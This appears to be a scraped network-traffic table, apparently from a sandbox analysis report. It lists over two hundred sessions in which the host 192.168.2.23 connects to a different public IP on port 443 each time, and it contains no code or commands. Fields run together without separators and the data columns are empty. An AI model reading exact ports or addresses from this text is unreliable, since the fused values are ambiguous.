                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13515192.168.2.2342208175.112.253.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13516192.168.2.233802478.110.100.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13517192.168.2.234556276.219.3.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13518192.168.2.2359564184.155.80.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13519192.168.2.2360832117.237.119.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13520192.168.2.233573643.65.98.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13521192.168.2.2340830113.99.191.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13522192.168.2.2334894116.0.0.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13523192.168.2.2353678196.33.30.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13524192.168.2.234973472.64.8.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13525192.168.2.234770444.40.224.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13526192.168.2.2351150171.69.45.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13527192.168.2.234334448.222.10.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13528192.168.2.235561641.94.159.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13529192.168.2.2344428176.226.22.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13530192.168.2.2334526143.94.32.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13531192.168.2.2349286104.228.189.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13532192.168.2.233689886.173.214.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13533192.168.2.234836083.1.5.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13534192.168.2.235808661.139.203.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13535192.168.2.23577585.249.245.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13536192.168.2.2337812208.164.148.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13537192.168.2.2333210194.43.190.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13538192.168.2.2333074212.199.141.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13539192.168.2.2355434135.231.61.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13540192.168.2.2353116131.19.201.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13541192.168.2.2342618106.97.192.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13542192.168.2.2357670138.248.44.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13543192.168.2.233933682.117.28.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13544192.168.2.234023425.22.139.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13545192.168.2.233513248.137.21.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13546192.168.2.233375638.158.88.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13547192.168.2.2359080160.153.82.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13548192.168.2.235311475.65.252.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13549192.168.2.2352330190.7.237.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13550192.168.2.2334722141.116.166.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13551192.168.2.2336300156.80.255.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13552192.168.2.2344970178.230.156.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13553192.168.2.23328185.23.105.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13554192.168.2.234578270.180.209.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13555192.168.2.2359242103.72.137.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13556192.168.2.2339288197.84.209.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13557192.168.2.2339714146.148.253.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13558192.168.2.2358844160.60.140.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13559192.168.2.2348732180.20.83.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13560192.168.2.2335848166.9.138.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13561192.168.2.2350942189.172.175.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13562192.168.2.2339436182.142.241.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13563192.168.2.235621262.224.98.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13564192.168.2.2347540129.234.124.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13565192.168.2.2352294129.91.132.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13566192.168.2.2350278114.17.113.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13567192.168.2.2333858148.48.182.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13568192.168.2.235741683.237.164.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13569192.168.2.2337662129.18.8.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13570192.168.2.2334154178.53.220.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13571192.168.2.2354986138.172.18.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13572192.168.2.234074446.67.223.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13573192.168.2.235461095.58.175.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13574192.168.2.23406784.215.28.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13575192.168.2.2344052113.46.115.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13576192.168.2.233450865.174.126.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13577192.168.2.2339216206.246.219.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13578192.168.2.234269891.23.27.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13579192.168.2.2357728221.84.99.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13580192.168.2.2347030194.240.115.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13581192.168.2.235476696.247.10.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13582192.168.2.234476662.239.169.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13583192.168.2.234875819.218.229.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13584192.168.2.2353482139.14.107.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13585192.168.2.2354240173.29.227.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13586192.168.2.2349070176.229.79.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13587192.168.2.2340758125.29.92.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13588192.168.2.2334986201.228.100.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13589192.168.2.2359072136.91.200.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13590192.168.2.235712876.234.213.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13591192.168.2.2337848128.128.178.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13592192.168.2.2359704115.214.163.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13593192.168.2.2338010194.57.35.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13594192.168.2.2354252188.113.178.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13595192.168.2.2348096175.131.27.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13596192.168.2.2340578148.192.41.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13597192.168.2.235213649.218.224.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13598192.168.2.2355282125.80.193.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13599192.168.2.233952862.117.138.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13600192.168.2.2360934188.91.223.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13601192.168.2.233426235.121.234.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13602192.168.2.2353602104.204.22.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13603192.168.2.233750252.235.227.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13604192.168.2.2350746163.242.202.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13605192.168.2.2344930111.28.188.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13606192.168.2.2345472128.71.82.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13607192.168.2.235282080.108.11.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13608192.168.2.234939227.37.100.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13609192.168.2.233346465.151.68.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13610192.168.2.2335784117.243.228.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13611192.168.2.2340834161.69.193.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13612192.168.2.2356922157.185.236.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13613192.168.2.233646014.87.133.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13614192.168.2.2336042186.193.105.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13615192.168.2.2360008211.244.28.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13616192.168.2.2359172172.63.205.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13617192.168.2.23579785.52.44.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13618192.168.2.233647834.229.116.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13619192.168.2.2349546142.251.151.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13620192.168.2.235895038.78.116.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13621192.168.2.2345768105.67.153.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13622192.168.2.235891227.137.150.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13623192.168.2.234577423.252.238.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13624192.168.2.2350898135.21.176.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13625192.168.2.2332928137.57.241.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13626192.168.2.2346648197.231.79.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13627192.168.2.233691085.149.149.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13628192.168.2.2342476141.133.93.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13629192.168.2.2354412155.122.194.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13630192.168.2.2348078124.108.112.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13631192.168.2.2346826109.41.226.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13632192.168.2.235274487.1.247.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13633192.168.2.234364053.174.231.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13634192.168.2.23440161.182.251.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13635192.168.2.2358454159.218.137.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13636192.168.2.2352598106.206.203.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13637192.168.2.2337688171.219.59.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13638192.168.2.2347324175.223.50.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13639192.168.2.233531839.120.122.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13640192.168.2.2357280179.171.46.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13641192.168.2.2336064167.216.93.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13642192.168.2.234444067.210.112.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13643192.168.2.234333894.24.32.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13644192.168.2.235297671.139.252.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13645192.168.2.2356112167.35.236.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13646192.168.2.234349264.156.59.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13647192.168.2.2347502194.9.127.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13648192.168.2.233532848.104.206.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13649192.168.2.2346030119.154.22.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13650192.168.2.234192290.221.236.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13651192.168.2.2333172142.253.160.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13652192.168.2.235080251.136.148.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13653192.168.2.2335436102.83.111.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13654192.168.2.2353764141.1.5.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13655192.168.2.2342480182.199.11.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13656192.168.2.2342346114.128.97.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13657192.168.2.234201658.171.4.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13658192.168.2.235154837.176.12.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13659192.168.2.2337026146.107.249.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13660192.168.2.233616877.53.101.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13661192.168.2.235831082.73.177.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13662192.168.2.235973267.167.158.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13663192.168.2.234997885.238.71.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13664192.168.2.2346854204.155.82.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13665192.168.2.235221499.133.118.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13666192.168.2.2360800120.26.73.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13667192.168.2.235941691.61.11.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13668192.168.2.2343678197.211.223.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13669192.168.2.2351396191.87.222.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13670192.168.2.2347160117.158.241.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13671192.168.2.2357010191.59.190.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13672192.168.2.234811839.215.16.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13673192.168.2.2334614203.135.21.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13674192.168.2.2340674169.141.198.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13675192.168.2.234391457.168.126.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13676192.168.2.2359688185.0.178.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13677192.168.2.2351536130.98.93.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13678192.168.2.2354580149.249.108.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13679192.168.2.2341682181.250.128.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13680192.168.2.2358080185.121.228.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13681192.168.2.234756245.40.31.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13682192.168.2.235640084.107.226.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13683192.168.2.234299253.104.18.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13684192.168.2.235715435.250.109.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13685192.168.2.2335202202.109.88.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13686192.168.2.2341428154.236.211.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13687192.168.2.2333892118.75.120.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13688192.168.2.2344598121.233.221.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13689192.168.2.23449429.35.51.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13690192.168.2.234830497.139.53.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13691192.168.2.2348188173.148.46.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13692192.168.2.235213841.22.199.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13693192.168.2.235454286.183.187.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13694192.168.2.2349440213.72.174.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13695192.168.2.2355004135.215.249.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13696192.168.2.234076490.162.68.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13697192.168.2.2338762168.53.68.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13698192.168.2.2349464171.135.73.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13699192.168.2.234761618.165.200.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13700192.168.2.2358094118.67.231.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13701192.168.2.234212682.63.0.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13702192.168.2.2342230159.91.48.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13703192.168.2.235847837.111.15.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13704192.168.2.233588834.15.106.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13705192.168.2.2342850207.136.80.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13706192.168.2.2360240116.190.35.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13707192.168.2.2341602209.61.8.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13708192.168.2.2347420183.107.144.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13709192.168.2.2357640180.99.80.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13710192.168.2.234067446.24.204.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13711192.168.2.234375027.105.32.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13712192.168.2.233591069.51.58.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13713192.168.2.2357878218.0.217.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13714192.168.2.233774284.72.77.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13715192.168.2.236055298.37.243.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13716192.168.2.234530843.245.82.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13717192.168.2.2358214159.171.121.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13718192.168.2.234457678.245.2.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13719192.168.2.2358570121.126.27.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13720192.168.2.2349352165.205.247.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13721192.168.2.234580287.26.210.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13722192.168.2.2334720153.242.78.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13723192.168.2.2360280106.136.122.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13724192.168.2.233660465.156.214.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13725192.168.2.2345480158.124.153.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13726192.168.2.235546234.90.227.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13727192.168.2.235687246.195.88.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13728192.168.2.234498051.7.137.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13729192.168.2.2349504166.125.135.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13730192.168.2.2336806170.138.127.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13731192.168.2.2333652117.124.212.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13732192.168.2.2345186180.2.57.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13733192.168.2.2336248130.30.140.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13734192.168.2.2334612210.82.141.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13735192.168.2.235796643.169.153.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
